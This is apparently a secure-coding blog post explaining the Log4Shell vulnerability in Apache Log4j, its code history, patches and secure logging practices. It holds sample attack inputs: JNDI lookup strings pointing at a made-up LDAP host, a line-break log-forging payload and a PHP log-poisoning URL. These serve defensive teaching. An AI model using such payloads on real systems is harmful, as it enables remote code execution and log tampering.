Nobody is wrong, yet everyone knows something is wrong

Posted on Wednesday, Dec 15, 2021 by Attila Szasz ~13 minute(s) to read

Every once in a while, there is that stupid one-liner implementation bug that can be found in all critical systems, and that fancy exploitation technique that nobody has thought of in the past century, which results in a security vulnerability that not only disrupts the whole internet, but all hell breaks loose for cybersecurity professionals, IT admins and developers alike.

The Log4Shell vulnerability is not one of those. Even though the problem is more severe than that.

In this article, let’s look behind the curtain of this worldwide cybersecurity threat and learn its lessons through the eyes of a programmer.

Let’s start with some facts you probably already know.

Application logging is the process of recording events that have occurred within a software application with the purpose of preserving background information that provides insight into the runtime operation of the application. On one hand, the main purpose is to help programmers find implementation bugs and operational misbehaviours; on the other hand, logs also help in discovering security issues and serve as audit trails.

Logging security information during the runtime operation of an application is an essential concept and in fact a requirement that implementations must adhere to. Security requirements are frequently put in place to ensure that

all security relevant events are logged,
no sensitive information is included,
integrity of logs is protected,
inputs are validated at all times to prevent so-called log injection attacks, where an attacker attempts to forge log entries and inject malicious content via specially crafted input values,
log files are forwarded to some central storage to protect against scenarios where some nodes of a complex distributed system get compromised. Rightfully so, as they often do.

Bottom line? Logging is hard.

As a software developer, you would expect that there must be an established recommendation for implementing secure logging in your application. So, the conventional wisdom on the street says:

You should never reinvent the wheel. Instead, you should always prefer a mature library for security-related tasks.
Open-source libraries are well-scrutinized and of higher code quality than whatever you have at home or in the corporation you are working for.
Logging more is always better than logging less.

What happens when everyone trusts these assumptions blindly for years, services are implemented along these lines, hundreds of thousands of them get exposed on the internet, yet it turns out that somehow, some of these assumptions were fundamentally violated?

CVE-2021-44228. And apparently, nobody is even wrong.

CC0 image by xkcd

What happened?

An exploit was disclosed on December 9, 2021, affecting Apache Log4j2, a ubiquitous library used by millions for Java applications. The library is part of the Apache Software Foundation’s Apache Logging Services project. The vulnerability, when exploited, results in remote code execution on the vulnerable server with the privileges of the application doing the logging. As a result, it is rated at a CVSS v3 score of 10.0, the highest possible.

All versions of Log4j2 from 2.0-beta9 up to 2.14.1 are affected by this vulnerability.

In plain English, please?

What really happened was a security disclosure that made us realize that everything we were logging via this library was interpreted in a control context, treating user input as a kind of format string when message lookup substitution was enabled (and for some weird reason that we are going to investigate, it was enabled by default).

Imagine you were about to smuggle some droids and Luke Skywalker through Mos Eisley. Imperials stop you, but it is 2021 and these ones take their Ashtanga yoga seriously, so your Jedi mind tricks won’t work this time, unfortunately. You go

“These aren’t the droids you are looking for. ${jndi:ldap://kenobi.ben/bye}”

Imperials are confused, but they log your response on their computers. They leave you alone, and the saga continues. Or better yet, "${jndi:ldap://kenobi.ben/destroydeathstar}" and let’s get this over with.

So we have this injection kind of vulnerability that is of exceptional impact, but what is the technical background?

The basic attack vector itself has been thoroughly discussed in the community. An attacker can simply ask a server to pass a payload of their choice through the vulnerable library, and once that is done, they enjoy all the comforts of enterprise Java application design. Log4J will oblige with that request and the receiving end is going to initiate a JNDI session over LDAP to download a piece of malicious code in that particular directory for execution. An LDAP endpoint of the attacker’s choice will be selected, and it turns out that not even the most up-to-date Java runtime is going to save the victim from the consequences when the attacker is careful enough with their payload.

Let’s summarize. Code is running on the victim’s system. No file system or config file control is needed, only a log message of the attacker’s choice. Pretty bad indeed.
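To make the mechanism concrete, here is a minimal toy model of lookup substitution applied to log messages. It is not Log4j code: the class ToyLookupLogger, its format method and the "<remote object>" placeholder are invented for illustration, and the pretend jndi lookup only records the URL instead of opening a network connection.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;

// Toy model of lookups being applied to message text. NOT Log4j code.
class ToyLookupLogger {
    // Lookup prefix -> resolver; "jndi" handles ${jndi:...} sequences.
    private final Map<String, Function<String, String>> lookups = new HashMap<>();
    // Every URL the pretend "jndi" lookup would have contacted.
    final List<String> contactedUrls = new ArrayList<>();
    private final boolean lookupsInMessages;

    ToyLookupLogger(boolean lookupsInMessages) {
        this.lookupsInMessages = lookupsInMessages;
        // A real JNDI lookup would talk to the remote server at this point.
        lookups.put("jndi", url -> {
            contactedUrls.add(url);
            return "<remote object>";
        });
    }

    // Returns the line that would end up in the log.
    String format(String message) {
        if (!lookupsInMessages) {
            return message; // message text is treated as plain data
        }
        StringBuilder out = new StringBuilder();
        int pos = 0;
        while (true) {
            int start = message.indexOf("${", pos);
            int end = start < 0 ? -1 : message.indexOf('}', start);
            if (start < 0 || end < 0) {
                return out.append(message.substring(pos)).toString();
            }
            out.append(message, pos, start);
            String body = message.substring(start + 2, end);
            int colon = body.indexOf(':');
            Function<String, String> resolver =
                    colon < 0 ? null : lookups.get(body.substring(0, colon));
            // Unknown lookups are left in the text untouched.
            out.append(resolver == null
                    ? message.substring(start, end + 1)
                    : resolver.apply(body.substring(colon + 1)));
            pos = end + 1;
        }
    }

    public static void main(String[] args) {
        ToyLookupLogger logger = new ToyLookupLogger(true);
        // The "user input" is simply concatenated into the message.
        System.out.println(logger.format("Login failed for ${jndi:ldap://kenobi.ben/bye}"));
        System.out.println("Would have contacted: " + logger.contactedUrls);
    }
}
```

With lookups in messages switched on, the attacker-supplied text decides which server gets contacted; with the flag switched off, the same text is written to the log verbatim.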

As a side note, please take a moment to think about all the statements of code that were deemed SQL injection vulnerabilities in the past. A lot of code, a lot of queries.

If we had the power to travel back in time and if we could replace all the vulnerable SQL queries of past decades with corresponding secure implementations, but for some reason, we were also forced to pass the corresponding user input to log4j calls after those statements, then arguably we would be in a worse shape today in terms of security after all. Up until now, the industry wouldn’t have had any idea that the innocent-looking log statements are just as wrong as the SQL injections that we were supposed to mitigate against.

And of course, who could have thought that you must mitigate against the inherent security weaknesses of your log statements as well. A known devil is better than an unknown angel.

It is not a bug, it is a feature

The designers of the library implemented Lookups that were designed to assist the developer in adding values to the Log4j configuration at arbitrary places. This does make sense for customizing, for instance, file patterns based on the current date:

<RollingFile name="Rolling-${map:type}" fileName="${filename}" filePattern="target/rolling1/test1-$${date:MM-dd-yyyy}.%i.log.gz">
  <PatternLayout>
    <pattern>%d %p %c{1.} [%t] %m%n</pattern>
  </PatternLayout>
  <SizeBasedTriggeringPolicy size="500" />
</RollingFile>

However, the list of lookup features grew over time, culminating in the current set of 18 types of Lookup substitutions that Log4j supports, including things like Docker and Kubernetes variable lookups, as well as the really problematic Environment and JNDI lookups that turned innocent-looking logging expressions into really scary vulnerabilities.

JNDI? What is that?

RFC2713 is a 21-page document defined in 1999, titled Schema for Representing Java(tm) Objects in an LDAP Directory. JNDI itself was defined a year earlier. In the Java world, managing objects remotely via directory interfaces and network protocols is a common daily task, and usually one would consult these technologies and associated ~~anti-~~ patterns when faced with a problem of this type.

Log4j was maintained in the spirit of these specifications, and we ended up with a situation where ${jndi:ldap://...} sequences in a specially crafted string passed into the logging APIs defined by Log4j would remotely load attacker-controlled Java class files via LDAP over the internet.

Nobody asked the question whether having full-fledged JNDI lookups around in message substitutions might be a bad idea.

In fact, it is pretty instructive to reference LOG4J2-3198 here, which was the issue opened a few weeks ago (yeah, before the CVE came out, bonus points for transparency) and the associated pull request #607 that finally realized that:

“This feature is not used as far as we’ve been able to tell searching github and stackoverflow, so it’s unnecessary for every log event in every application to burn several cpu cycles searching for the value.”

The actual fix by the way (PR #608) limits JNDI to the minimum and restricts LDAP use.

Backdoor or design failure?

Probably a very bad case of code reuse.

Let’s dig into the development of the source code involved.

Authors of the library went back and forth on this particular feature, to be fair. As early as 2016, issues like LOG4J2-905 were put in place to mitigate compatibility problems resulting from the somewhat reckless design decision to apply lookups to message payloads as well. The developers of Log4j were trying to come up with a clever solution that did not break existing workflows. They had no harmful intent as far as I can tell, but they simply missed the security implications of their choices.

The central piece of code of our investigation is src/main/java/org/apache/logging/log4j/core/pattern/MessagePatternConverter.java, which was meant to provide a class able to replace format string specifiers with values corresponding to the various Lookup backends Log4j implemented over the years. The critical mistake, of course, was not realizing that reusing StrSubstitutors with configurations defaulting to the basic Interpolator class (log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java) via statements like

protected final StrSubstitutor substitutor = new StrSubstitutor(new Interpolator());

in the config factory was going to result in message text substitutions being interpreted in a fairly rich context, where JNDI lookups were possible via log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java.

Judging from the way these classes are organized and from JIRA issue LOG4J2-3198, we can see that the authors of the codebase did their best to support existing workflows without realizing the critical security implications. This eventually resulted in completely reverting message lookup substitutions via LOG4J2-3211, when the implications of the CVE became clear just 18 hours before this publication was released.

Code as early as commit 6a4c88d contains logic that clearly tries to support disabling message lookups:

// TODO can we optimize this?
if (config != null && !noLookups) {
    for (int i = offset; i < workingBuilder.length() - 1; i++) {
        if (workingBuilder.charAt(i) == '$' && workingBuilder.charAt(i + 1) == '{') {
            final String value = workingBuilder.substring(offset, workingBuilder.length());
            workingBuilder.setLength(offset);
            workingBuilder.append(config.getStrSubstitutor().replace(event, value));
        }
    }
}

A review of commit logs, pull requests, git blame on relevant files and related documentation shows no indication of intentional modification of any of this logic for malicious purposes.

We concluded that the resulting vulnerability is really the result of an unintentional misjudgment: reusing Lookup and StrSubstitutor business logic at the message parsing level. Maintaining compatibility with a feature-rich string replacement logic that was designed to comply with overly permissive specs allowing for JNDI, inclusive of LDAP and other security-sensitive protocols, resulted in the aforementioned security issue.

How does this affect you, and what should you do?

A lot of organizations are affected: hundreds of them have already publicly announced that they are investigating the potential impact on their systems [1], and there are surely tons of others. The good folks at GreyNoise (hey Andrew![2]) have already identified 2196 public IPs[3] that are opportunistically spraying the whole IPv4 range in hopes of exploiting the vulnerability, and in that sense, everyone on the internet is in danger to some degree.

To identify whether you are affected, a thorough review of asset inventories and SBOMs is probably necessary across your organization’s software portfolio. Diving into log analytics, closely following vendor bulletins and using file system discovery methods should also help in understanding how much this impacts you.

In terms of software development, you should force Gradle or Maven to resolve non-vulnerable versions of Log4j. There are hot patches available that are worth looking into, and of course the main recommendation is to update to the latest version of the library or to use a backported release (2.16.0 and 2.12.2-rc1, respectively).

Secure coding lessons

Don’t feel bad if you used this library in your development and ended up producing some entry points for this vulnerability. It is no more your fault than it is Will Hunting’s or anyone else’s at this point. Security vulnerabilities are present in third-party software; all we can do is minimize the likelihood of similar catastrophes by employing a software development lifecycle that integrates security end-to-end.

As cliché as it sounds on the blog of a secure coding training provider, we really think that the cheapest and most effective way to do software security is through training.

The most important secure coding lesson is to protect against log-injection:

Tampering with the input of logging methods was generally not something that security professionals considered as a remote code execution threat in the average case, but for those who are late to the party, we’ll quickly recap log injection and log forging techniques (as defined by OWASP) to highlight that issues similar to the attack vectors discussed are much more common and relevant to you than this exceptional situation might suggest.

Let’s consider the following web application code [4].

...
    String val = request.getParameter("val");
    try {
        int value = Integer.parseInt(val);
    }
    catch (NumberFormatException e) {
        // The raw, attacker-controlled string is written to the log as-is.
        log.info("Failed to parse val=" + val);
    }
...

We try to read an integer, and if we can’t parse it, we log the problem. The attacker can clearly submit things like

twenty-one%0a%0aINFO:+User+logged+out%3dbadguy

so that the following entry gets logged:

INFO: Failed to parse val=twenty-one

INFO: User logged out=badguy
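One common mitigation for this kind of forging is to neutralize line breaks before the value reaches the logger. The following is a minimal sketch under that assumption; the class LogSanitizer and its sanitize method are hypothetical helpers, not part of any logging library.

```java
// Hypothetical helper that keeps one piece of input on one log line.
class LogSanitizer {
    // Replaces CR and LF with visible escape sequences.
    static String sanitize(String input) {
        if (input == null) {
            return "null";
        }
        return input.replace("\r", "\\r").replace("\n", "\\n");
    }

    public static void main(String[] args) {
        // The decoded form of the attacker's request parameter.
        String val = "twenty-one\n\nINFO: User logged out=badguy";
        // Stands in for log.info(...); the forged entry stays inside the first line.
        System.out.println("INFO: Failed to parse val=" + sanitize(val));
    }
}
```

Keep in mind that escaping line breaks only addresses forged entries. It would not have stopped a ${jndi:...} sequence from being evaluated by a vulnerable Log4j version.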

Can we highlight an example where actual remote code execution could result from this? Our old friend, PHP, comes to the “rescue”:

https://www.somedomain.tld/index.php?file=<?php echo phpinfo(); ?>

Using a query like this, we could poison a log file to contain some nasty PHP code, and misconfigured web servers of the past were prone to these kinds of command injections when the poisoned log file could be invoked as code. Fortunately, neither I nor OWASP can list a similar issue from the Node/Express world, and let’s hope that Log4Shell will prove to be the last modern-day logging issue that could be turned into an RCE.

Principles of secure logging:

On top of what was already discussed in the context of secure logging, here are the 5 main points that we encourage you to adhere to when it comes to your own logging practices and infrastructure.

1. Purposeful logging.

The question here that you have to answer is, which events are security related or required for operational use? Make sure you log all of those, but only those.

2. No sensitive information in the logs.

Redact/exclude/anonymize sensitive information. Decide whether a piece of information helps you or the attacker.
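As a small illustration of redaction, the sketch below masks anything that looks like a payment card number before the message is logged. The rule itself (13 to 19 consecutive digits, keep the last four) and the class name LogRedactor are assumptions made for this example; what counts as sensitive depends on your application.

```java
import java.util.regex.Pattern;

// Hypothetical redaction helper; the pattern is an example rule, not a standard.
class LogRedactor {
    // 13 to 19 consecutive digits; the last four are captured so they can be kept.
    private static final Pattern CARD = Pattern.compile("\\b\\d{9,15}(\\d{4})\\b");

    // Masks card-like numbers and leaves the rest of the message alone.
    static String redact(String message) {
        return CARD.matcher(message).replaceAll("****$1");
    }

    public static void main(String[] args) {
        System.out.println(redact("Payment with card 4111111111111111 accepted"));
    }
}
```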

3. Integrity protection of each log entry.

Apply extended hash or HMAC signatures for all log events uniquely.

extended_hash_of_a_new_log_entry := hash(previous hash + hash(new_log_entry))
hmac_of_a_new_log_entry := hmac(key + previous hmac + hmac(new_log_entry))

Ideally, calculate these hash values in a hardware security module, such as a TPM chip, to ensure that no entries can be removed from a log file unnoticed.
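The chaining idea can be sketched in a few lines of Java. This is only one possible reading of the HMAC formula above, namely tag = HMAC(key, previous tag || HMAC(key, entry)); the class HmacLogChain, the all-zero starting tag and the in-memory key are assumptions for illustration, and a real deployment would keep the key in the HSM rather than in the process.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.MessageDigest;
import java.util.ArrayList;
import java.util.List;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

// Sketch of an HMAC chain over log entries; key handling is deliberately naive.
class HmacLogChain {
    final List<String> entries = new ArrayList<>();
    final List<byte[]> tags = new ArrayList<>();
    private final SecretKeySpec key;

    HmacLogChain(byte[] keyBytes) {
        this.key = new SecretKeySpec(keyBytes, "HmacSHA256");
    }

    // tag = HMAC(key, previousTag || HMAC(key, entry))
    private byte[] tagFor(byte[] previousTag, String entry) {
        try {
            Mac mac = Mac.getInstance("HmacSHA256");
            mac.init(key);
            byte[] entryMac = mac.doFinal(entry.getBytes(StandardCharsets.UTF_8));
            mac.update(previousTag); // doFinal above reset the Mac to its keyed state
            return mac.doFinal(entryMac);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    // Appends an entry and links its tag to the previous one.
    void append(String entry) {
        byte[] previous = tags.isEmpty() ? new byte[32] : tags.get(tags.size() - 1);
        entries.add(entry);
        tags.add(tagFor(previous, entry));
    }

    // Returns the index of the first entry whose tag does not verify, or -1.
    int firstBrokenIndex() {
        byte[] previous = new byte[32];
        for (int i = 0; i < entries.size(); i++) {
            if (!MessageDigest.isEqual(tagFor(previous, entries.get(i)), tags.get(i))) {
                return i;
            }
            previous = tags.get(i);
        }
        return -1;
    }
}
```

Because every tag depends on the one before it, editing or removing an entry in the middle breaks verification from that point on. Cutting entries off the end of the file is only detectable if the latest tag is also stored somewhere the attacker cannot reach.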

4. No input values in the logs.

Log files are inherently vulnerable to injection-type attacks. So no values and no strings that may come from external sources should be written into log entries. If it is absolutely necessary to record a value that may be influenced by the outside world, store it only in encoded form: apply Base64 encoding to binary inputs, text strings and even numeric values.

[2021-12-15 09:15:23] The applicant <U0NBREVNWQ> registered for the “Advanced TPM Security” course. HMAC=10e4c532a05be7b7c189dfc9c5b9057543427c58
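A log entry like the one above could be produced along these lines. The sketch uses the standard java.util.Base64 encoder without padding, which matches the encoded value in the example; the class name EncodedLogValue and its two methods are hypothetical.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

// Hypothetical helper that encodes externally influenced values before logging.
class EncodedLogValue {
    // Base64 output contains only letters, digits, '+' and '/', so no '$', '{' or line breaks.
    static String encode(String untrusted) {
        return Base64.getEncoder().withoutPadding()
                .encodeToString(untrusted.getBytes(StandardCharsets.UTF_8));
    }

    // For the analyst reading the log later; the decoder accepts unpadded input.
    static String decode(String encoded) {
        return new String(Base64.getDecoder().decode(encoded), StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        String applicant = "SCADEMY"; // pretend this came from a web form
        System.out.println("The applicant <" + encode(applicant) + "> registered.");
    }
}
```

The trade-off is readability: anyone reading the log has to decode values first, but whatever the attacker typed stays inert data on its way through the logging pipeline.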

5. Logs should be shipped away to some central storage

Use the updated Log4j for this purpose. :-)

Update

Oops. Rather don’t use it. A vulnerability has been found in the patch.

Closing thoughts

CC0 image by The Cyber Security Hub

If you use third-party components that everybody else uses, you will be affected by the vulnerabilities found and published in those components, just like everybody else. This will not be your fault. If you decide to develop your own proprietary solution, then be prepared to commit the same mistakes and to learn from them. We all learn from mistakes. The question is whether we commit those mistakes during training or in production.